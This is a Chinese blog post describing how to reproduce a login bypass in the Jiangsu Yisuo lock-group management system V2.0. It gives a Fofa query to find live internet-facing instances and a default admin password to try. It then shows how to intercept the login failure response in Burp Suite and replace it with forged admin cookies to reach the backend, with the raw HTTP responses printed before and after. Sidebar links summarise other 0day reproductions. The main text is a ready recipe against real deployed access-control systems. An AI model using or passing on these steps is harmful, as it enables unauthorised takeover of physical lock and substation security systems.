锁群管理系统0day复现

最新推荐文章于 2024-07-16 08:46:03 发布
最新推荐文章于 2024-07-16 08:46:03 发布
阅读量439 收藏 3
点赞数 2
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Foreverlove112/article/details/126755691
版权

一:漏洞介绍

江苏易索电子科技股份有限公司是专业从事变电站视频监控系统、无源智能锁群管理系统开发、电力智能辅助监控系统,配电房监控系统,智能门禁系统,生产及销售的高科技企业。 江苏易索电子科技股份有限公司锁群管理系统存在逻辑缺陷漏洞,攻击者可利用该漏洞获取敏感信息。

漏洞详情

在登陆处由于只进行了前端验证,造成用户可以伪造前端的返回包内容来绕过登录,进而进入后台接管后台权限。经过测试发现,可以通杀2.0版本。

二:漏洞利用

步骤一:使用Fofa搜索以下语句并随便打开一个连接地址…尝试若口令登录(admin:123456)

title=="锁群管理系统 V2.0"

在这里插入图片描述
在这里插入图片描述
步骤二:设置Burpsuite抓取Response数据包并添加如下规则…
在这里插入图片描述
步骤三:本人使用火狐浏览器在使用BurpSuite工具前先添加插件
在这里插入图片描述在这里插入图片描述在这里插入图片描述

步骤四:先开启插件再登录页面输入用户名admin并随便输入密码,开启代理抓包修改返回数据包如下…
在这里插入图片描述


修改之前:
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Thu, 25 Nov 2021 09:29:15 GMT
Connection: close
Content-Length: 30

用户名或密码不正确!

修改之后:
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: username=admin; path=/
Set-Cookie: code=admin; path=/
Set-Cookie: power=1; path=/
Set-Cookie: powerName=%e8%b6%85%e7%ba%a7%e7%ae%a1%e7%90%86%e5%91%98; path=/
X-Powered-By: ASP.NET
Date: Thu, 25 Nov 2021 09:29:15 GMT
Connection: close
Content-Length: 30

在这里插入图片描述
步骤四:放包之后就可以登录到后台界面中…此时操作关闭代理
在这里插入图片描述

Doxi-13A
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
大华智慧园区综合管理平台RCE漏洞复现(0day)
0xSec
07-15 4600
大华智慧园区设备开放了文件上传功能,但未在上传的文件类型、大小、格式、路径等方面进行严格的限制和过滤,导致攻击者可以通过构造恶意文件并上传到设备上,然后利用该漏洞获取权限并执行任意命令。
锁群管理系统
weixin_52525624的博客
02-24 3587
一:漏洞介绍 江苏易索电子科技股份有限公司是专业从事变电站视频监控系统、无源智能锁群管理系统开发、电力智能辅助监控系统,配电房监控系统,智能门禁系统,生产及销售的高科技企业。 江苏易索电子科技股份有限公司锁群管理系统存在逻辑缺陷漏洞,攻击者可利用该漏洞获取敏感信息。 》》》漏洞详情《《《 在登陆处由于只进行了前端验证,造成用户可以伪造前端的返回包内容来绕过登录,进而进入后台接管后台权限。 经过测试发现,可以通杀2.0版本。 二:漏洞利用 步骤一:使用Fofa搜索以下语句并随便打开一个连接地址..
【渗透学习】锁群管理系统、计算机组成原理、(python、Java)相关环境搭建
ZYP_997_的博客
06-07 319
【渗透学习】锁群管理系统、计算机组成原理、(python、Java)相关环境搭建
dedecms织梦严重0day漏洞(直接进后台)分析及修复
Yatere的天平秤
08-17 2648
众所周知,因使用简单、客户群多,织梦CMS一直被爆出许多漏洞。今天小编在群里得到织梦官方论坛某版主可靠消息:“DEDECMS爆严重安全漏洞,近期官方会发布相关补丁,望大家及时关注补丁动态。” bug被利用步骤如下: http://www.ywen.info/网站后台/
金融信息安全实训--网站漏洞利用
jyr2014的博客
06-11 1382
1、安装IIS相关环境并利用IIS服务器发布靶站源代码(注意应用程序池使用.net 4.0并开启.NET服务)2、cmd运行如下命令:“%WINDIR%Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" -iru -enable在计算机管理中找到”服务“,开启asp.net服务 3、在IIS里部署网站,应用程序池选择.net 4.0,在该应用池的高级设置中把32位应用程序设置为True 4、成功部署IIS web站点后,使用IE浏览器打开站点。...
---------HTTP报文解析
Fanbin168的专栏
08-07 2088
//我是一个Post请求,我告诉服务器:我要http://localhost:1538/WebForm1.aspx页面,我支持的httpb版本是1.1 POST http://localhost:1538/WebForm1.aspx HTTP/1.1 Accept: text/html, application/xhtml+xml, */* //告诉服务器我是从哪个页面链接过来的 Refere
海康威视iVMS系统在野 0day漏洞复现
m0_46371267的博客
05-26 2272
简介:海康威视iVMS系统存在在野 0day 漏洞,攻击者通过获取密钥任意构造token,请求/resourceOperations/upload接口任意上传文件,导致获取服务器webshell权限,同时可远程进行恶意代码执行。
0day nacos RCE命令执行漏洞复现含POC
weixin_43167326的博客
07-16 4275
NACOS是 一个开源的服务发现、配置管理和服务治理平台,属于阿里巴巴的一款开源产品。
0day漏洞复现【禹路由器管理员账号密码泄露】
qq_47289634的博客
05-10 243
​免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。中移铁通禹路由器支持宽带拨号、动态IP和静态IP三种上网模式,中移禹路由器ExportSettings处存在信息泄露漏洞,通过响应包的账号密码,攻击者可以获取后台权限。鹰图:web.body=“互联世界 物联未来-登录”fofa:title=“互联世界 物联未来-登录”使用响应读取到的账号密码登录后台。
逃逸IE浏览器沙箱-在野0Day漏洞利用复现
10-13
标题中的“逃逸IE浏览器沙箱-在野0Day漏洞利用复现”指的是针对Internet Explorer(IE)浏览器的安全研究,特别是关于如何利用未公开(0Day漏洞来突破浏览器的安全沙箱机制。沙箱是一种安全措施,它限制了恶意代码...
武汉大学操作系统实验 - 复现一个操作系统.zip
04-20
学生可能需要实现分页或分段的内存管理系统。 3. **文件系统**:包括文件的创建、删除、读写操作,以及文件的组织结构(如目录、索引节点)。可能还会涉及磁盘I/O管理和缓冲区管理。 4. **设备管理**:学习I/O控制...
mpeg2视频0day漏洞演示程序
07-20
在分析和研究这个0day漏洞的演示程序时,安全研究人员会尝试复现漏洞,理解其触发条件和机制,然后开发相应的补丁或者防御策略。同时,这也为软件开发者提供了一个学习如何防止类似漏洞的机会,以提升软件的安全性。
毕业设计——基于监督学习的web入侵检测系统(0day收集器).zip
03-15
【标题】:“毕业设计——基于监督学习的web入侵检测系统(0day收集器).zip” 这个毕业设计项目聚焦于构建一个基于监督学习的Web入侵检测系统,特别强调了0day攻击的检测能力。0day攻击是指那些还未被公开或未知的...
Apache Solr最新版任意文件读取0day1
08-03
在最新的版本中,报告了一个未授权的任意文件读取0day漏洞,该漏洞允许攻击者通过特定的请求获取服务器上的任意文件内容,即使在默认配置下。以下是关于这个漏洞的详细解释和复现步骤。 0x01 正文全版本任意文件...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8385
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
1111111111111111111111
08-13
1111111111111111
javascript笔试题参考整理(答案)(可编辑修改word版).docx
08-13
javascript笔试题参考整理(答案)(可编辑修改word版)
财务收支表-公式计算查询.xlsx
最新发布
08-13
工资表,财务报表,对账表,付款申请,财务报告,费用支出表,财务收支 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
王清主编:Windows 0day漏洞分析全攻略
由于其特殊性,0day漏洞常被攻击者用于发起高度针对性和破坏性的攻击,如植入木马、病毒或间谍软件,因为它们能在厂商发布安全补丁之前对系统造成严重损害。由于0day漏洞技术资料的机密性,其利用往往成为攻击者的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值